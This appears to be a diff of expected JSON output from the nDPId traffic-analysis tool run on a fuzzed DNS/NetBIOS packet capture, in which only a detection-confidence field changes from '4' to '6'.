00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1120469848977,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469848977,"pkt":"ADBUADRWAODtAW69CABFAABIaigAAIARTSmsqAECwKgBAQquADUANKw8fdoBAAABAAAA4wAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":146,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469848977,"flow_last_seen":1120469848977,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"172.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469663172,"flow_last_seen":1120469663172,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.136.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469848977,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1120469850980,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469850980,"pkt":"ADBUADRWAODtAW69CABFAABIaikAAFIRTSjAqAECwKgBAQquADUANKw8fdoBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJYaXR5AmRrAAAhAAE="} 
-00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469847979,"flow_last_seen":1120469850980,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469850980,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberxity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00798{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":147,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469847979,"flow_last_seen":1120469850980,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469850980,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberxity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1120469852983,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469852983,"pkt":"ADBUADRWAODtAW69CABFAABIaioAAIARTSfAqAECwKgBAQquADUANKw8Q9oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469847979,"flow_last_seen":1120469852983,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469852983,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":150,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469847979,"flow_last_seen":1120469852983,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469852983,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1120469864991,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469864991,"pkt":"ADBUADRWAODtAW69CABFAABEakEAAIARTSnIqAECwKgBAQqvADUAMDE089sAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRzBGFycGEAAAwAAQ=="} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-adds.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":152,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864991,"flow_last_seen":1120469864991,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469864991,"l3_proto":"ip4","src_ip":"200.168.1.2","dst_ip":"192.168.1.1","src_port":2735,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-adds.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1120469864992,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469864992,"pkt":"AODzAW69ADBUADRWCABFAABbAABAAEARtz79qAEBwKgBAgA1Cq8ARxOw89uAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":153,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469864992,"flow_last_seen":1120469864992,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469864992,"l3_proto":"ip4","src_ip":"253.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2735,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469680447,"flow_last_seen":1120469680447,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":9587,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120469664171,"flow_last_seen":1120469680185,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2722,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469680186,"flow_last_seen":1120469680186,"flow_idle_time":200000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2723,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00594{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469685131,"flow_last_seen":1120469685131,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":25481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00593{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":156,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469865145,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
@@ -259,185 +259,185 @@ 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469681446,"flow_last_seen":1120469689458,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469877188,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2724,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1120469921898,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469921898,"pkt":"ADBUADRWAODtAW69CABFAABIajUAAIARTRzAqAECwKgBAQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":159,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469921898,"flow_last_seen":1120469921898,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469921898,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1120469922894,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469922894,"pkt":"ADBUADRWAODtAW69CABFAABIJXMAAIARTRvAqAECwKgBAQp8ADUANK14fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJRHliZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":160,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469922894,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.dybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1120469924456} 00416{"packet_event_id":1,"packet_event_name":"packet","packet_id":163,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"thread_ts_msec":1120469923705,"pkt":"\/\/\/\/\/\/\/\/AODtAW69qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1120469924897,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469924897,"pkt":"ADBUADRWAODtAW69CABFAABIajoAAIARTRfAqAECwKgBEQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
